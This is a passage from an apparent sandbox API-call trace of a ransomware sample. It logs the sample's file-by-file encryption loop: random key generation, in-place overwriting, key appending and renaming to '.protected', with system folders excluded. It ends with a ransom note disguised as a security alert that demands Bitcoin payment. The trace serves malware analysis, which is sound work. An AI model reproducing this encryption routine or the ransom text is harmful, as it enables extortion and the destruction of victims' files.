hTemplateFile=0x0) returned 0xb4 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".rar") returned 0x0 [0091.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0091.121] StrStrW (lpFirst="Administrator.contact", lpSrch=".zip") returned 0x0 [0091.121] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.131] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.131] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.132] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.132] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.132] CloseHandle (hObject=0xb4) returned 1 [0091.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.protected") returned 74 [0091.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.protected")) returned 1 [0091.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Windows") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Program Files") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Program Files (x86)") returned -1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="$Recycle.bin") returned 1 [0091.134] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="System Volume Information") returned -1 [0091.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrIW (lpFirst="asdlfk poopvy.contact", lpSrch=".protected") returned 0x0 [0091.134] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.134] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.134] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".txt") returned 0x0 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".rar") returned 0x0 [0091.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0091.134] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".zip") returned 0x0 [0091.135] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x493, lpOverlapped=0x0) returned 1 [0091.139] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x493, lpOverlapped=0x0) returned 1 [0091.139] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.139] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 
[0091.139] CloseHandle (hObject=0xb4) returned 1 [0091.140] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.protected") returned 74 [0091.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.protected")) returned 1 [0091.140] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.140] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Windows") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Program Files") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Program Files (x86)") returned -1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="$Recycle.bin") returned 1 [0091.141] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="System Volume Information") returned -1 [0091.141] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrIW (lpFirst="chucu jadnvk.contact", lpSrch=".protected") returned 0x0 [0091.141] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".txt") returned 0x0 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".rar") returned 0x0 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".zip") returned 0x0 [0091.142] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x499, lpOverlapped=0x0) returned 1 [0091.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x499, lpOverlapped=0x0) returned 1 [0091.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.143] CloseHandle (hObject=0xb4) returned 1 [0091.144] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.protected") returned 73 [0091.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.protected")) returned 1 [0091.144] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.144] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.144] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.144] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.144] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.144] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.144] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.145] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0091.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.145] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0091.146] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.146] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.146] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.146] CloseHandle (hObject=0xb4) returned 1 [0091.146] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.protected") returned 64 [0091.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.protected")) returned 1 [0091.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Windows") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Program Files") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Program Files (x86)") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="$Recycle.bin") returned 1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="System Volume Information") returned -1 [0091.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrIW (lpFirst="lulcit amkdfe.contact", lpSrch=".protected") returned 0x0 [0091.147] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.147] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".txt") returned 0x0 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".rar") returned 0x0 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".zip") returned 0x0 [0091.147] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x496, lpOverlapped=0x0) returned 1 [0091.148] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x496, lpOverlapped=0x0) returned 1 [0091.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.149] CloseHandle (hObject=0xb4) returned 1 [0091.149] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.protected") returned 74 [0091.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.protected")) returned 1 [0091.150] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Windows") returned -1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Program Files") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Program Files (x86)") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="$Recycle.bin") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="System Volume Information") returned -1 [0091.150] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.150] StrStrIW (lpFirst="sikvnb huvuib.contact", lpSrch=".protected") returned 0x0 [0091.150] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2="RESTORE_FILES.txt") returned 1 [0091.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".txt") returned 0x0 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".rar") returned 0x0 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".zip") returned 0x0 [0091.151] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x494, lpOverlapped=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x494, lpOverlapped=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.152] CloseHandle (hObject=0xb4) returned 1 [0091.153] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.protected") returned 74 [0091.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.protected")) returned 1 [0091.153] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.153] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.153] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\RESTORE_FILES.txt") returned 60 [0091.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.154] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, 